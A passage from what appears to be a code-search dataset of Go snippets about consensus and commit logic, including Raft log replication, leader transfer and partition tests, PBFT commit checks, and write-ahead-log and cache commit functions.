Force peer a to commit a log entry at its term\n\tfor i := 0; i < sm.heartbeatTimeout; i++ {\n\t\tsm.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\tif sm.raftLog.committed != 4 {\n\t\tt.Fatalf(\"committed = %d, want 4\", sm.raftLog.committed)\n\t}\n\tlastLogTerm := sm.raftLog.zeroTermOnErrCompacted(sm.raftLog.term(sm.raftLog.committed))\n\tif lastLogTerm != sm.Term {\n\t\tt.Fatalf(\"last log term = %d, want %d\", lastLogTerm, sm.Term)\n\t}\n\n\t// Ensure peer a accepts read only request after it commits a entry at its term.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: wctx}}})\n\tif len(sm.readStates) != 1 {\n\t\tt.Fatalf(\"len(readStates) = %d, want 1\", len(sm.readStates))\n\t}\n\trs := sm.readStates[0]\n\tif rs.Index != windex {\n\t\tt.Fatalf(\"readIndex = %d, want %d\", rs.Index, windex)\n\t}\n\tif !bytes.Equal(rs.RequestCtx, wctx) {\n\t\tt.Fatalf(\"requestCtx = %v, want %v\", rs.RequestCtx, wctx)\n\t}\n}", "func (rf *Raft) updateCommit(newCommitIndex int) {\n\n\tif newCommitIndex < rf.commitIndex {\n\t\tpanic(fmt.Sprintf(\"Server %v: new commit index %v is lower than previous one %v\\n\", rf.me, newCommitIndex, rf.commitIndex))\n\t}\n\n\trf.commitIndex = newCommitIndex\n\trf.debug(\"New commit index: %v\\n\", rf.commitIndex)\n\n\tif rf.commitIndex > rf.lastEntryIndex() {\n\t\tpanic(fmt.Sprintf(\"Server %v: new commit index is bigger than log size (%v, %v)\\n\", rf.me, rf.commitIndex, rf.lastEntryIndex()))\n\t}\n}", "func TestRemoveLeader(t *testing.T) {\n\tdefer leaktest.AfterTest(t)\n\tstopper := stop.NewStopper()\n\tconst clusterSize = 6\n\tconst groupSize = 3\n\tcluster := newTestCluster(nil, clusterSize, stopper, t)\n\tdefer stopper.Stop()\n\n\t// Consume and apply the membership change events.\n\tfor i := 0; i < clusterSize; i++ {\n\t\tgo func(i int) {\n\t\t\tfor {\n\t\t\t\tif e, ok := <-cluster.events[i].MembershipChangeCommitted; ok {\n\t\t\t\t\te.Callback(nil)\n\t\t\t\t} else {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(i)\n\t}\n\n\t// Tick all the clocks in the background to ensure that all the\n\t// necessary elections are triggered.\n\t// TODO(bdarnell): newTestCluster should have an option to use a\n\t// real clock instead of a manual one.\n\tstopper.RunWorker(func() {\n\t\tticker := time.NewTicker(10 * time.Millisecond)\n\t\tdefer ticker.Stop()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-stopper.ShouldStop():\n\t\t\t\treturn\n\t\t\tcase <-ticker.C:\n\t\t\t\tfor _, t := range cluster.tickers {\n\t\t\t\t\tt.NonBlockingTick()\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\n\t// Create a group with three members.\n\tgroupID := roachpb.RangeID(1)\n\tcluster.createGroup(groupID, 0, groupSize)\n\n\t// Move the group one node at a time from the first three nodes to\n\t// the last three. In the process, we necessarily remove the leader\n\t// and trigger at least one new election among the new nodes.\n\tfor i := 0; i < groupSize; i++ {\n\t\tlog.Infof(\"adding node %d\", i+groupSize)\n\t\tch := cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeAddNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i+groupSize].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tlog.Infof(\"removing node %d\", i)\n\t\tch = cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeRemoveNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n}", "func (entry *TableEntry) ApplyCommit() (err error) {\n\terr = entry.BaseEntryImpl.ApplyCommit()\n\tif err != nil {\n\t\treturn\n\t}\n\t// It is not wanted that a block spans across different schemas\n\tif entry.isColumnChangedInSchema() {\n\t\tentry.FreezeAppend()\n\t}\n\t// update the shortcut to the lastest schema\n\tentry.TableNode.schema.Store(entry.GetLatestNodeLocked().BaseNode.Schema)\n\treturn\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func (s *PBFTServer) committed(ent *entry) bool {\n\tif len(ent.c) > 2*s.f {\n\t\t// Key is replica id\n\t\tvalidSet := make(map[int]bool)\n\t\tfor i, sz := 0, len(ent.c); i < sz; i++ {\n\t\t\tif ent.c[i].View == ent.pp.View && ent.c[i].Seq == ent.pp.Seq && ent.c[i].Digest == ent.pp.Digest {\n\t\t\t\tvalidSet[ent.c[i].Rid] = true\n\t\t\t}\n\t\t}\n\t\treturn len(validSet) > 2*s.f\n\t}\n\treturn false\n}", "func (server *Server) LeaderCommitOp(op *rpc.Operation, idx string) *common.Future {\n\treq := &rpc.CommitRequest{\n\t\tIdx: idx,\n\t\tOp: op,\n\t}\n\n\t// Async RPC to followers\n\tcommitNum := 0\n\tvar commitLock sync.Mutex\n\tcommitCv := sync.NewCond(&commitLock)\n\tfor _, addr := range server.FollowerAddrList {\n\t\tgo func(addr string) {\n\t\t\tserver.SendCommitRequest(addr, req)\n\n\t\t\tcommitLock.Lock()\n\t\t\tcommitNum++\n\t\t\tcommitLock.Unlock()\n\t\t\tcommitCv.Signal()\n\t\t}(addr)\n\t}\n\n\t// Async local commit\n\tgo func() {\n\t\tserver.CommitOp(op, idx).GetValue()\n\t\tcommitLock.Lock()\n\t\tcommitNum++\n\t\tcommitLock.Unlock()\n\t\tcommitCv.Signal()\n\t}()\n\n\tdone := common.NewFuture()\n\n\tgo func() {\n\t\tcommitLock.Lock()\n\t\tfor commitNum < server.MajorityNum {\n\t\t\tcommitCv.Wait()\n\t\t}\n\t\tcommitLock.Unlock()\n\t\tdone.SetValue(true)\n\t}()\n\n\treturn done\n}", "func (self *WAL) Commit(requestNumber uint32, serverId uint32) error {\n\tconfirmationChan := make(chan *confirmation)\n\tself.entries <- &commitEntry{confirmationChan, serverId, requestNumber}\n\tconfirmation := <-confirmationChan\n\treturn confirmation.err\n}", "func (r *RaftNode) updateCommitIndex() {\n\t// If there exists an N such that:\n\t// 1) N > commitIndex,\n\t// 2) a majority of matchIndex[i] >= N, and\n\t// 3) log[N].term == currentTerm\n\t// Then:\n\t// set commitIndex = N\n\tfor n := r.commitIndex + 1; n <= r.getLastLogIndex(); n++ {\n\t\tif r.Log[n].Term != r.CurrentTerm {\n\t\t\tif r.verbose {\n\t\t\t\tlog.Printf(\"commitIndex %d ineligible because of log entry %s\", n, r.Log[n].String())\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\t\tpeersAtThisLevel := make(map[HostID]bool)\n\t\tfor hostID := range r.hosts {\n\t\t\tif hostID == r.id {\n\t\t\t\tpeersAtThisLevel[hostID] = true\n\t\t\t} else {\n\t\t\t\tpeersAtThisLevel[hostID] = r.matchIndex[hostID] >= n\n\t\t\t}\n\t\t}\n\t\tif haveMajority(peersAtThisLevel, \"COMMIT IDX\", r.verbose) {\n\t\t\tr.commitIndex = n\n\t\t}\n\t}\n}", "func TestCommitConflictRace4A(t *testing.T) {\n}", "func TestSingleCommit4A(t *testing.T) {\n}", "func TestPartitionOfCluster(t *testing.T) {\n\n\n\trafts, cluster := makeMockRafts() // array of []raft.Node\n\n\tfor i:=0; i<5; i++ {\n\t\tdefer rafts[i].raft_log.Close()\n\t\tgo rafts[i].processEvents()\n\t}\n\n\ttime.Sleep(2*time.Second)\n\tvar ldr *RaftNode\n\tvar mutex sync.RWMutex\n\tfor {\n\t\tmutex.Lock()\n\t\tldr = getLeader(rafts)\n\t\tif (ldr != nil) {\n\t\t\tbreak\n\t\t}\n\t\tmutex.Unlock()\n\t}\n\n\tldr.Append([]byte(\"foo\"))\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\t//if ci.Err != nil {t.Fatal(ci.Err)}\n\t\t\tif string(ci.Data.Data) != \"foo\" {\n\t\t\t\tt.Fatal(\"Got different data\")\n\t\t\t}\n\t\tdefault:\n\t\t}\n\t}\n\n\n\tfor {\n\t\tldr = getLeader(rafts)\n\t\tif (ldr != nil) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif(ldr.Id() == 1 || ldr.Id() == 0) {\n\t\tcluster.Partition([]int{0, 1}, []int{2, 3, 4})\n\t} else if(ldr.Id() == 2) {\n\t\tcluster.Partition([]int{0, 1, 3}, []int{2, 4})\n\t} else {\n\t\tcluster.Partition([]int{0, 1, 2}, []int{3, 4})\n\t}\n\n\tldr.Append([]byte(\"foo2\"))\n\tvar ldr2 *RaftNode\n\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\tt.Fatal(\"Got different data \"+ string(ci.Data.Data))\n\t\tdefault:\n\t\t}\n\t}\n\n\tcluster.Heal()\n\n\ttime.Sleep(3*time.Second)\n\tfor {\n\t\tldr2 = getLeader(rafts)\n\n\t\tif (ldr2 != nil && ldr2.sm.serverID != ldr.sm.serverID) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// Leader will not have \"fooAgain\" entry, will force new entry to all nodes\n\tldr2.Append([]byte(\"foo3\"))\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\tif string(ci.Data.Data) != \"foo3\" {\n\t\t\t\tt.Fatal(\"Got different data \"+ string(ci.Data.Data))\n\t\t\t}\n\t\t}\n\t}\n\n\tfor _, node := range rafts {\n\t\tnode.Shutdown()\n\t}\n\n}", "func TestCommitConflictRepeat4A(t *testing.T) {\n}", "func (s *SharedLog_) Commit_follower(Entry_pre LogEntry_, Entry_cur LogEntry_, conn net.Conn) bool {\n\tse := r.GetServer(r.id)\n\ti := len(r.log.Entries)\n\tif i == 1{\n\t\tif r.log.Entries[i-1].Term == Entry_cur.Term && r.log.Entries[i-1].SequenceNumber == Entry_cur.SequenceNumber{\n\t\t\t raft.Input_ch <- raft.String_Conn{string(r.log.Entries[i-1].Command), conn}\n\t\t\t\tr.log.Entries[i-1].IsCommitted = true\n\t\t\t\tse.LsnToCommit++\n\t\t\t\treturn true\n\t\t}// end of inner if\n\t} //end i == 1\n\t\n\tif i>1{\n\t\tif r.log.Entries[i-2].Term == Entry_pre.Term && r.log.Entries[i-2].SequenceNumber == Entry_pre.SequenceNumber{\n\t\t\tif r.log.Entries[i-1].Term == Entry_cur.Term && r.log.Entries[i-1].SequenceNumber == Entry_cur.SequenceNumber{\n\t\t\t\traft.Input_ch <- raft.String_Conn{string(r.log.Entries[i-1].Command), conn}\n\t\t\t\tr.log.Entries[i-1].IsCommitted = true\n\t\t\t\tse.LsnToCommit++\n\t\t\t\treturn true\n\t\t\t}//end of cur_entry\n\t\t}//end of prev_entry\n\t}//end of index check\n\treturn false\n}", "func TestCommitMissingPrewrite4a(t *testing.T) {\n}", "func TestEmptyCommit4A(t *testing.T) {\n}", "func TestRecommitKey4A(t *testing.T) {\n}", "func (instance *cache) unsafeCommitEntry(key string, content Cacheable) (ce *Entry, xerr fail.Error) {\n\tif _, ok := instance.reserved[key]; !ok {\n\t\treturn nil, fail.NotAvailableError(\"the cache entry '%s' is not reserved\", key)\n\t}\n\n\t// content may bring new key, based on content.GetID(), than the key reserved; we have to check if this new key has not been reserved by someone else...\n\tif content.GetID() != key {\n\t\tif _, ok := instance.reserved[content.GetID()]; ok {\n\t\t\treturn nil, fail.InconsistentError(\"the cache entry '%s' corresponding to the ID of the content is reserved; content cannot be committed\", content.GetID())\n\t\t}\n\t}\n\n\t// Everything seems ok, we can update\n\tvar ok bool\n\tif ce, ok = instance.cache[key]; ok {\n\t\t// FIXME: this has to be tested with a specific unit test\n\t\terr := content.AddObserver(instance)\n\t\tif err != nil {\n\t\t\treturn nil, fail.ConvertError(err)\n\t\t}\n\t\t// if there was an error after this point we should Remove the observer\n\n\t\tce.content = data.NewImmutableKeyValue(content.GetID(), content)\n\t\t// reserved key may have to change accordingly with the ID of content\n\t\tdelete(instance.cache, key)\n\t\tdelete(instance.reserved, key)\n\t\tinstance.cache[content.GetID()] = ce\n\t\tce.unlock()\n\n\t\treturn ce, nil\n\t}\n\n\treturn nil, fail.NotFoundError(\"failed to find cache entry identified by '%s'\", key)\n}", "func TestStep0Committee(t *testing.T) {\n\tassert.NotPanics(t, func() {\n\t\tp, ks := consensus.MockProvisioners(10)\n\t\th := committee.NewHandler(ks[0], *p)\n\t\th.AmMember(1, 0, 10)\n\t})\n}", "func TestLeaderTransferToUpToDateNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (rf *Raft) AppendEntry(args AppendEntryArgs, reply *AppendEntryReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Success = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\trf.state = FOLLOWER\n\trf.currentTerm = args.Term\n\trf.votedFor = -1\n\treply.Term = args.Term\n\n\tif args.PrevLogIndex >= 0 &&\n\t\t(len(rf.log)-1 < args.PrevLogIndex ||\n\t\t\trf.log[args.PrevLogIndex].Term != args.PrevLogTerm) {\n\t\treply.Success = false\n\t\treply.CommitIndex = min(len(rf.log)-1, args.PrevLogIndex)\n\t\tfor reply.CommitIndex >= 0 &&\n\t\t\trf.log[reply.CommitIndex].Term != args.PrevLogTerm {\n\t\t\treply.CommitIndex--\n\t\t}\n\t} else if args.Entries != nil {\n\t\trf.log = append(rf.log[:args.PrevLogIndex+1], args.Entries...)\n\t\tif len(rf.log) > args.LeaderCommit {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t//TODO:commitlog\n\t\t\tgo rf.CommitLog()\n\t\t}\n\t\treply.CommitIndex = len(rf.log) - 1\n\t\treply.Success = true\n\t} else {\n\t\tif len(rf.log) > args.LeaderCommit {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t//TODO:commitlog\n\t\t\tgo rf.CommitLog()\n\t\t}\n\t\treply.CommitIndex = args.PrevLogIndex\n\t\treply.Success = true\n\t}\n\trf.persist()\n\trf.timer.Reset(properTimeDuration(rf.state))\n}", "func TestReceiveConsensusSetUpdate(t *testing.T) {\n\tif testing.Short() {\n\t\tt.SkipNow()\n\t}\n\tht, err := newHostDBTester(\"TestFindHostAnnouncements\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Put a host announcement into the blockchain.\n\tannouncement := encoding.Marshal(modules.HostAnnouncement{\n\t\tIPAddress: ht.gateway.Address(),\n\t})\n\ttxnBuilder := ht.wallet.StartTransaction()\n\ttxnBuilder.AddArbitraryData(append(modules.PrefixHostAnnouncement[:], announcement...))\n\ttxnSet, err := txnBuilder.Sign(true)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\terr = ht.tpool.AcceptTransactionSet(txnSet)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Check that, prior to mining, the hostdb has no hosts.\n\tif len(ht.hostdb.AllHosts()) != 0 {\n\t\tt.Fatal(\"Hostdb should not yet have any hosts\")\n\t}\n\n\t// Mine a block to get the transaction into the consensus set.\n\tb, _ := ht.miner.FindBlock()\n\terr = ht.cs.AcceptBlock(b)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Check that there is now a host in the hostdb.\n\tif len(ht.hostdb.AllHosts()) != 1 {\n\t\tt.Fatal(\"hostdb should have a host after getting a host announcement transcation\")\n\t}\n}", "func (s *OrderServer) processCommit() {\n\tfor e := range s.commitC {\n\t\tif s.isLeader {\n\t\t\tlog.Debugf(\"%v\", e)\n\t\t}\n\t\ts.subCMu.RLock()\n\t\tfor _, c := range s.subC {\n\t\t\tc <- e\n\t\t}\n\t\ts.subCMu.RUnlock()\n\t}\n}", "func TestCommitMultipleKeys4A(t *testing.T) {\n}", "func TestSplit(t *testing.T){\r\n\tif !TESTSPLIT{\r\n\t\treturn\r\n\t}\r\n\tcontents := make([]string, 2)\r\n\tcontents[0] = \"duckduck\"\r\n\tcontents[1] = \"go\"\r\n\tmkcl, err := mock.NewCluster(\"input_spec.json\")\r\n\trafts,err := makeMockRafts(mkcl,\"log\", 250, 350) \r\n\tcheckError(t,err, \"While creating mock clusters\")\r\n\ttime.Sleep(5*time.Second)\r\n\trafts[0].Append([]byte(contents[0]))\r\n\ttime.Sleep(5*time.Second)\r\n\tmkcl.Lock()\r\n\tpart1 := []int{1,3}\r\n\tpart2 := []int{2,4}\r\n\trafts[1].smLock.RLock()\r\n\tldrId := rafts[4].LeaderId()\r\n\trafts[1].smLock.RUnlock()\r\n\tfmt.Printf(\"ldrId:%v\\n\", ldrId)\r\n\tif ldrId % 2 == 0{\r\n\t\tpart2 = append(part2, 5)\r\n\t}else{\r\n\t\tpart1 = append(part1, 5)\r\n\t}\r\n\tmkcl.Unlock()\r\n\tmkcl.Partition(part1, part2)\r\n\tdebugRaftTest(fmt.Sprintf(\"Partitions: %v %v\\n\", part1, part2))\r\n\ttime.Sleep(4*time.Second)\r\n\tmkcl.Lock()\r\n\trafts[ldrId-1].Append([]byte(contents[1]))\r\n\tmkcl.Unlock()\r\n\ttime.Sleep(8*time.Second)\r\n\tmkcl.Heal()\r\n\tdebugRaftTest(fmt.Sprintf(\"Healed\\n\"))\r\n\ttime.Sleep(8*time.Second)\r\n\tciarr := []int{0,0,0,0,0}\r\n\tfor cnt:=0;cnt<5;{\r\n\t\tfor idx, node := range rafts {\r\n\t\t\tselect {\r\n\t\t\tcase ci := <-node.CommitChannel():\r\n\t\t\t\tif ci.Err != nil {\r\n\t\t\t\t\tfmt.Fprintln(os.Stderr,ci.Err)\r\n\t\t\t\t}\r\n\t\t\t\t//Testing CommitChannel \r\n\t\t\t\texpect(t,contents[ciarr[idx]],string(ci.Data))\r\n\t\t\t\tciarr[idx] += 1\r\n\t\t\t\tif ciarr[idx] == 2{\r\n\t\t\t\t\tcnt +=1 \r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tfor _, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tnode.Shutdown()\r\n\t}\r\n}", "func (_RandomBeacon *RandomBeaconTransactor) SubmitRelayEntry(opts *bind.TransactOpts, entry []byte, groupMembers []uint32) (*types.Transaction, error) {\n\treturn _RandomBeacon.contract.Transact(opts, \"submitRelayEntry\", entry, groupMembers)\n}", "func TestProposeAfterRemoveLeader(t *testing.T) {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\n\tmn := newMultiNode(1)\n\tgo mn.run()\n\tdefer mn.Stop()\n\n\tstorage := NewMemoryStorage()\n\tif err := mn.CreateGroup(1, newTestConfig(1, nil, 10, 1, storage),\n\t\t[]Peer{{ID: 1}}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := mn.Campaign(ctx, 1); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tif err := mn.ProposeConfChange(ctx, 1, raftpb.ConfChange{\n\t\tType: raftpb.ConfChangeRemoveNode,\n\t\tNodeID: 1,\n\t}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tgs := <-mn.Ready()\n\tg := gs[1]\n\tif err := storage.Append(g.Entries); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfor _, e := range g.CommittedEntries {\n\t\tif e.Type == raftpb.EntryConfChange {\n\t\t\tvar cc raftpb.ConfChange\n\t\t\tif err := cc.Unmarshal(e.Data); err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\tmn.ApplyConfChange(1, cc)\n\t\t}\n\t}\n\tmn.Advance(gs)\n\n\tif err := mn.Propose(ctx, 1, []byte(\"somedata\")); err != nil {\n\t\tt.Errorf(\"err = %v, want nil\", err)\n\t}\n}", "func TestContractSetApplyInsertUpdateAtStartup(t *testing.T) {\n\tif testing.Short() {\n\t\tt.SkipNow()\n\t}\n\tt.Parallel()\n\t// Prepare a header for the test.\n\theader := contractHeader{Transaction: types.Transaction{\n\t\tFileContractRevisions: []types.FileContractRevision{{\n\t\t\tParentID: types.FileContractID{1},\n\t\t\tNewValidProofOutputs: []types.SiacoinOutput{{}, {}},\n\t\t\tUnlockConditions: types.UnlockConditions{\n\t\t\t\tPublicKeys: []types.SiaPublicKey{{}, {}},\n\t\t\t},\n\t\t}},\n\t}}\n\tinitialRoots := []crypto.Hash{{}, {}, {}}\n\t// Prepare a valid and one invalid update.\n\tvalidUpdate, err := makeUpdateInsertContract(header, initialRoots)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tinvalidUpdate, err := makeUpdateInsertContract(header, initialRoots)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tinvalidUpdate.Name = \"invalidname\"\n\t// create contract set and close it.\n\ttestDir := build.TempDir(t.Name())\n\trl := ratelimit.NewRateLimit(0, 0, 0)\n\tcs, err := NewContractSet(testDir, rl, modules.ProdDependencies)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Prepare the insertion of the invalid contract.\n\ttxn, err := cs.staticWal.NewTransaction([]writeaheadlog.Update{invalidUpdate})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\terr = <-txn.SignalSetupComplete()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Close the contract set.\n\tif err := cs.Close(); err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Load the set again. This should ignore the invalid update and succeed.\n\tcs, err = NewContractSet(testDir, rl, modules.ProdDependencies)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Make sure we can't acquire the contract.\n\t_, ok := cs.Acquire(header.ID())\n\tif ok {\n\t\tt.Fatal(\"shouldn't be able to acquire the contract\")\n\t}\n\t// Prepare the insertion of 2 valid contracts within a single txn. This\n\t// should be ignored at startup.\n\ttxn, err = cs.staticWal.NewTransaction([]writeaheadlog.Update{validUpdate, validUpdate})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\terr = <-txn.SignalSetupComplete()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Close the contract set.\n\tif err := cs.Close(); err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Load the set again. This should apply the invalid update and fail at\n\t// startup.\n\tcs, err = NewContractSet(testDir, rl, modules.ProdDependencies)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Make sure we can't acquire the contract.\n\t_, ok = cs.Acquire(header.ID())\n\tif ok {\n\t\tt.Fatal(\"shouldn't be able to acquire the contract\")\n\t}\n\t// Prepare the insertion of a valid contract by writing the change to the\n\t// wal but not applying it.\n\ttxn, err = 